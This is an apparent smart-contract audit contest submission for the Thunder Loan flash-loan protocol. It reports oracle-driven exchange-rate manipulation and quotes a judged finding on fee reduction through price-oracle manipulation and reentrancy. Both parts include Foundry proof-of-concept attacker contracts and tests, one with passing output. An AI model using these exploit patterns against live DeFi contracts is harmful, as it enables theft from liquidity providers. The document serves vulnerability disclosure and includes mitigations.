Thunder Loan
AI First Flight #7
Beginner FriendlyFoundryDeFiOracle
EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

Exchange Rate Manipulation Through Flash Loan Oracle Dependency

firmanregar

Root + Impact

Description

ThunderLoan's flashloan() function calculates fees using a spot-price oracle and immediately updates the AssetToken's exchange rate with this fee value. An attacker can manipulate the oracle price during a flash loan transaction, causing the exchange rate to be permanently inflated. This inflated rate is then used in redeem() to withdraw more underlying tokens than deposited, resulting in protocol insolvency.

The vulnerability exists in the interaction between three components:

  1. Fee Calculation - Uses spot price from TSwap oracle

  2. Exchange Rate Update - Permanently increases based on calculated fee

  3. Redemption - Trusts the exchange rate without solvency checks

    // ThunderLoan.sol - flashloan()
    function flashloan(address receiverAddress, IERC20 token, uint256 amount, bytes calldata params) external {
    // ...uint256 fee = getCalculatedFee(token, amount);
    // Uses oracle price
    assetToken.updateExchangeRate(fee);
    // Permanent state change
    // ...
    }
    function getCalculatedFee(IERC20 token, uint256 amount) public view returns (uint256 fee) {
    uint256 valueOfBorrowedToken = (amount \* getPriceInWeth(address(token))) / s\_feePrecision;
    fee = (valueOfBorrowedToken \* s\_flashLoanFee) / s\_feePrecision;
    }

    \

    // AssetToken.sol
    function updateExchangeRate(uint256 fee) external onlyThunderLoan {
    uint256 newExchangeRate = s\_exchangeRate \* (totalSupply() + fee) / totalSupply();
    if (newExchangeRate <= s\_exchangeRate) {
    revert AssetToken\_\_ExhangeRateCanOnlyIncrease(s\_exchangeRate, newExchangeRate);
    }
    s\_exchangeRate = newExchangeRate; // Irreversible increase
    emit ExchangeRateUpdated(s\_exchangeRate);\
    }

Risk

Likelihood:

  • An attacker can execute the following steps in a single transaction

    1. Price Manipulation: Use flash-borrowed capital to manipulate the TSwap pool, inflating the token's price

    2. Flash Loan: Call ThunderLoan.flashloan(), which:

      • Calculates an artificially high fee based on the manipulated price

      • Permanently increases the exchange rate using this inflated fee

    3. Repayment: Repay the flash loan normally (the loan itself succeeds)

    4. Price Normalization: Oracle price returns to normal after the manipulation unwinds

    5. Exploitation: Redeem AssetTokens at the inflated exchange rate, receiving more underlying tokens than economically justified

Impact:

  • Direct Loss: Attackers can extract excess underlying tokens from the AssetToken contract

  • Protocol Insolvency: The AssetToken becomes undercollateralized

  • Cascading Failure: Later depositors cannot fully redeem their positions

  • Permanent State Corruption: No mechanism exists to normalize or reverse the exchange rate inflation

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;
import "forge-std/Test.sol";
import "../src/protocol/ThunderLoan.sol";
import "../src/protocol/AssetToken.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
// Simple AMM pool for testing
contract SimpleTSwapPool {
ERC20 public token;
ERC20 public weth;
constructor(ERC20 _token, ERC20 _weth) {
token = _token;
weth = _weth;
}
function seed(uint256 tokenAmt, uint256 wethAmt) external {
token.transferFrom(msg.sender, address(this), tokenAmt);
weth.transferFrom(msg.sender, address(this), wethAmt);
}
function getPriceOfOnePoolTokenInWeth() external view returns (uint256) {
uint256 tokenBal = token.balanceOf(address(this));
uint256 wethBal = weth.balanceOf(address(this));
return (wethBal * 1e18) / tokenBal;
}
function swapTokenForWeth(uint256 tokenIn) external {
uint256 tokenBal = token.balanceOf(address(this));
uint256 wethBal = weth.balanceOf(address(this));
uint256 wethOut = (tokenIn * wethBal) / (tokenBal + tokenIn);
token.transferFrom(msg.sender, address(this), tokenIn);
weth.transfer(msg.sender, wethOut);
}
}
contract TestToken is ERC20 {
constructor(string memory n) ERC20(n, n) {}
function mint(address to, uint256 amt) external { _mint(to, amt); }
}
contract AttackerReceiver {
ThunderLoan public loan;
IERC20 public token;
constructor(ThunderLoan _loan, IERC20 _token) {
loan = _loan;
token = _token;
}
function executeOperation(
address,
uint256 amount,
uint256 fee,
address,
bytes calldata
) external returns (bool) {
token.approve(address(loan), amount + fee);
loan.repay(token, amount + fee);
return true;
}
}
contract ExchangeRateManipulationTest is Test {
ThunderLoan loan;
AssetToken asset;
TestToken token;
TestToken weth;
SimpleTSwapPool pool;
AttackerReceiver receiver;
address attacker = address(0xBEEF);
address lp = address(0xCAFE);
function setUp() public {
// Setup tokens and pool
vm.startPrank(lp);
token = new TestToken("TOKEN");
weth = new TestToken("WETH");
token.mint(lp, 1_000 ether);
weth.mint(lp, 1_000 ether);
pool = new SimpleTSwapPool(token, weth);
token.approve(address(pool), type(uint256).max);
weth.approve(address(pool), type(uint256).max);
pool.seed(100 ether, 100 ether);
vm.stopPrank();
// Deploy ThunderLoan
loan = new ThunderLoan();
loan.initialize(address(this));
// Allow token
vm.prank(loan.owner());
asset = loan.setAllowedToken(token, true);
// Setup attacker
receiver = new AttackerReceiver(loan, token);
token.mint(attacker, 10 ether);
vm.startPrank(attacker);
token.approve(address(loan), type(uint256).max);
loan.deposit(token, 1 ether);
vm.stopPrank();
}
function test_ExchangeRateInflation() public {
uint256 attackerBalanceBefore = token.balanceOf(attacker);
uint256 exchangeRateBefore = asset.getExchangeRate();
// Manipulate oracle price
vm.startPrank(attacker);
token.approve(address(pool), type(uint256).max);
pool.swapTokenForWeth(20 ether);
// Flash loan triggers exchange rate inflation
loan.flashloan(address(receiver), token, 10 ether, "");
uint256 exchangeRateAfter = asset.getExchangeRate();
// Redeem at inflated rate
loan.redeem(token, type(uint256).max);
vm.stopPrank();
uint256 attackerBalanceAfter = token.balanceOf(attacker);
// Verify exploitation
assertGt(exchangeRateAfter, exchangeRateBefore, "Exchange rate not inflated");
assertGt(attackerBalanceAfter, attackerBalanceBefore, "No value extracted");
emit log_named_uint("Exchange rate increase", exchangeRateAfter - exchangeRateBefore);
emit log_named_uint("Tokens extracted", attackerBalanceAfter - attackerBalanceBefore);
}
}

The exchange rate increase is permanent and irreversible, but it's based on a temporary price manipulation. Once the oracle price returns to normal, the inflated exchange rate remains, creating a disconnect between the accounting rate and actual economic value.

Recommended Mitigation

Consider implementing one or more of the following fixes:

  1. Use Time-Weighted Average Price (TWAP) instead of spot price for fee calculations

  2. Remove exchange rate dependency on oracle prices - calculate fees in a way that doesn't affect long-term accounting

  3. Implement solvency checks in redeem() to ensure sufficient backing

  4. Add exchange rate bounds to limit the maximum increase per update

  5. Separate flash loan fees from exchange rate calculations entirely

Example fix for the deposit function (where a similar issue exists):
\

function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {
AssetToken assetToken = s\_tokenToAssetToken\[token];
uint256 exchangeRate = assetToken.getExchangeRate();
uint256 mintAmount = (amount \* assetToken.EXCHANGE\_RATE\_PRECISION()) / exchangeRate;
emit Deposit(msg.sender, token, amount);
assetToken.mint(msg.sender, mintAmount);\
// Remove this line - don't update exchange rate based on fees during deposit
// uint256 calculatedFee = getCalculatedFee(token, amount);
// assetToken.updateExchangeRate(calculatedFee);
token.safeTransferFrom(msg.sender, address(assetToken), amount);\
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 11 days ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-02] Attacker can minimize `ThunderLoan::flashloan` fee via price oracle manipulation

## Vulnerability details In `ThunderLoan::flashloan` the price of the `fee` is calculated on [line 192](https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L192) using the method `ThunderLoan::getCalculatedFee`: ```solidity uint256 fee = getCalculatedFee(token, amount); ``` ```solidity function getCalculatedFee(IERC20 token, uint256 amount) public view returns (uint256 fee) { //slither-disable-next-line divide-before-multiply uint256 valueOfBorrowedToken = (amount * getPriceInWeth(address(token))) / s_feePrecision; //slither-disable-next-line divide-before-multiply fee = (valueOfBorrowedToken * s_flashLoanFee) / s_feePrecision; } ``` `getCalculatedFee()` uses the function `OracleUpgradeable::getPriceInWeth` to calculate the price of a single underlying token in WETH: ```solidity function getPriceInWeth(address token) public view returns (uint256) { address swapPoolOfToken = IPoolFactory(s_poolFactory).getPool(token); return ITSwapPool(swapPoolOfToken).getPriceOfOnePoolTokenInWeth(); } ``` This function gets the address of the token-WETH pool, and calls `TSwapPool::getPriceOfOnePoolTokenInWeth` on the pool. This function's behavior is dependent on the implementation of the `ThunderLoan::initialize` argument `tswapAddress` but it can be assumed to be a constant product liquidity pool similar to Uniswap. This means that the use of this price based on the pool reserves can be subject to price oracle manipulation. If an attacker provides a large amount of liquidity of either WETH or the token, they can decrease/increase the price of the token with respect to WETH. If the attacker decreases the price of the token in WETH by sending a large amount of the token to the liquidity pool, at a certain threshold, the numerator of the following function will be minimally greater (not less than or the function will revert, see below) than `s_feePrecision`, resulting in a minimal value for `valueOfBorrowedToken`: ```solidity uint256 valueOfBorrowedToken = (amount * getPriceInWeth(address(token))) / s_feePrecision; ``` Since a value of `0` for the `fee` would revert as `assetToken.updateExchangeRate(fee);` would revert since there is a check ensuring that the exchange rate increases, which with a `0` fee, the exchange rate would stay the same, hence the function will revert: ```solidity function updateExchangeRate(uint256 fee) external onlyThunderLoan { // 1. Get the current exchange rate // 2. How big the fee is should be divided by the total supply // 3. So if the fee is 1e18, and the total supply is 2e18, the exchange rate be multiplied by 1.5 // if the fee is 0.5 ETH, and the total supply is 4, the exchange rate should be multiplied by 1.125 // it should always go up, never down // newExchangeRate = oldExchangeRate * (totalSupply + fee) / totalSupply // newExchangeRate = 1 (4 + 0.5) / 4 // newExchangeRate = 1.125 uint256 newExchangeRate = s_exchangeRate * (totalSupply() + fee) / totalSupply(); // newExchangeRate = s_exchangeRate + fee/totalSupply(); if (newExchangeRate <= s_exchangeRate) { revert AssetToken__ExhangeRateCanOnlyIncrease(s_exchangeRate, newExchangeRate); } s_exchangeRate = newExchangeRate; emit ExchangeRateUpdated(s_exchangeRate); } ``` `flashloan()` can be reentered on [line 201-210](https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L201-L210): ```solidity receiverAddress.functionCall( abi.encodeWithSignature( "executeOperation(address,uint256,uint256,address,bytes)", address(token), amount, fee, msg.sender, params ) ); ``` This means that an attacking contract can perform an attack by: 1. Calling `flashloan()` with a sufficiently small value for `amount` 2. Reenter the contract and perform the price oracle manipulation by sending liquidity to the pool during the `executionOperation` callback 3. Re-calling `flashloan()` this time with a large value for `amount` but now the `fee` will be minimal, regardless of the size of the loan. 4. Returning the second and the first loans and withdrawing their liquidity from the pool ensuring that they only paid two, small `fees for an arbitrarily large loan. ## Impact An attacker can reenter the contract and take a reduced-fee flash loan. Since the attacker is required to either: 1. Take out a flash loan to pay for the price manipulation: This is not financially beneficial unless the amount of tokens required to manipulate the price is less than the reduced fee loan. Enough that the initial fee they pay is less than the reduced fee paid by an amount equal to the reduced fee price. 2. Already owning enough funds to be able to manipulate the price: This is financially beneficial since the initial loan only needs to be minimally small. The first option isn't financially beneficial in most circumstances and the second option is likely, especially for lower liquidity pools which are easier to manipulate due to lower capital requirements. Therefore, the impact is high since the liquidity providers should be earning fees proportional to the amount of tokens loaned. Hence, this is a high-severity finding. ## Proof of concept ### Working test case The attacking contract implements an `executeOperation` function which, when called via the `ThunderLoan` contract, will perform the following sequence of function calls: - Calls the mock pool contract to set the price (simulating manipulating the price) - Repay the initial loan - Re-calls `flashloan`, taking a large loan now with a reduced fee - Repay second loan ```solidity // SPDX-License-Identifier: MIT pragma solidity 0.8.20; import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import { SafeERC20 } from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; import { IFlashLoanReceiver, IThunderLoan } from "../../src/interfaces/IFlashLoanReceiver.sol"; import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; import { MockTSwapPool } from "./MockTSwapPool.sol"; import { ThunderLoan } from "../../src/protocol/ThunderLoan.sol"; contract AttackFlashLoanReceiver { error AttackFlashLoanReceiver__onlyOwner(); error AttackFlashLoanReceiver__onlyThunderLoan(); using SafeERC20 for IERC20; address s_owner; address s_thunderLoan; uint256 s_balanceDuringFlashLoan; uint256 s_balanceAfterFlashLoan; uint256 public attackAmount = 1e20; uint256 public attackFee1; uint256 public attackFee2; address tSwapPool; IERC20 tokenA; constructor(address thunderLoan, address _tSwapPool, IERC20 _tokenA) { s_owner = msg.sender; s_thunderLoan = thunderLoan; s_balanceDuringFlashLoan = 0; tSwapPool = _tSwapPool; tokenA = _tokenA; } function executeOperation( address token, uint256 amount, uint256 fee, address initiator, bytes calldata params ) external returns (bool) { s_balanceDuringFlashLoan = IERC20(token).balanceOf(address(this)); // check if it is the first time through the reentrancy bool isFirst = abi.decode(params, (bool)); if (isFirst) { // Manipulate the price MockTSwapPool(tSwapPool).setPrice(1e15); // repay the initial, small loan IERC20(token).approve(s_thunderLoan, attackFee1 + 1e6); IThunderLoan(s_thunderLoan).repay(address(tokenA), 1e6 + attackFee1); ThunderLoan(s_thunderLoan).flashloan(address(this), tokenA, attackAmount, abi.encode(false)); attackFee1 = fee; return true; } else { attackFee2 = fee; // simulate withdrawing the funds from the price pool //MockTSwapPool(tSwapPool).setPrice(1e18); // repay the second, large low fee loan IERC20(token).approve(s_thunderLoan, attackAmount + attackFee2); IThunderLoan(s_thunderLoan).repay(address(tokenA), attackAmount + attackFee2); return true; } } function getbalanceDuring() external view returns (uint256) { return s_balanceDuringFlashLoan; } function getBalanceAfter() external view returns (uint256) { return s_balanceAfterFlashLoan; } } ``` The following test first calls `flashloan()` with the attacking contract, the `executeOperation()` callback then executes the attack. ```solidity function test_poc_smallFeeReentrancy() public setAllowedToken hasDeposits { uint256 price = MockTSwapPool(tokenToPool[address(tokenA)]).price(); console.log("price before: ", price); // borrow a large amount to perform the price oracle manipulation uint256 amountToBorrow = 1e6; bool isFirstCall = true; bytes memory params = abi.encode(isFirstCall); uint256 expectedSecondFee = thunderLoan.getCalculatedFee(tokenA, attackFlashLoanReceiver.attackAmount()); // Give the attacking contract reserve tokens for the price oracle manipulation & paying fees // For a less funded attacker, they could use the initial flash loan to perform the manipulation but pay a higher initial fee tokenA.mint(address(attackFlashLoanReceiver), AMOUNT); vm.startPrank(user); thunderLoan.flashloan(address(attackFlashLoanReceiver), tokenA, amountToBorrow, params); vm.stopPrank(); assertGt(expectedSecondFee, attackFlashLoanReceiver.attackFee2()); uint256 priceAfter = MockTSwapPool(tokenToPool[address(tokenA)]).price(); console.log("price after: ", priceAfter); console.log("expectedSecondFee: ", expectedSecondFee); console.log("attackFee2: ", attackFlashLoanReceiver.attackFee2()); console.log("attackFee1: ", attackFlashLoanReceiver.attackFee1()); } ``` ```bash $ forge test --mt test_poc_smallFeeReentrancy -vvvv // output Running 1 test for test/unit/ThunderLoanTest.t.sol:ThunderLoanTest [PASS] test_poc_smallFeeReentrancy() (gas: 1162442) Logs: price before: 1000000000000000000 price after: 1000000000000000 expectedSecondFee: 300000000000000000 attackFee2: 300000000000000 attackFee1: 3000 Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.52ms ``` Since the test passed, the fee has been successfully reduced due to price oracle manipulation. ## Recommended mitigation Use a manipulation-resistant oracle such as Chainlink.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!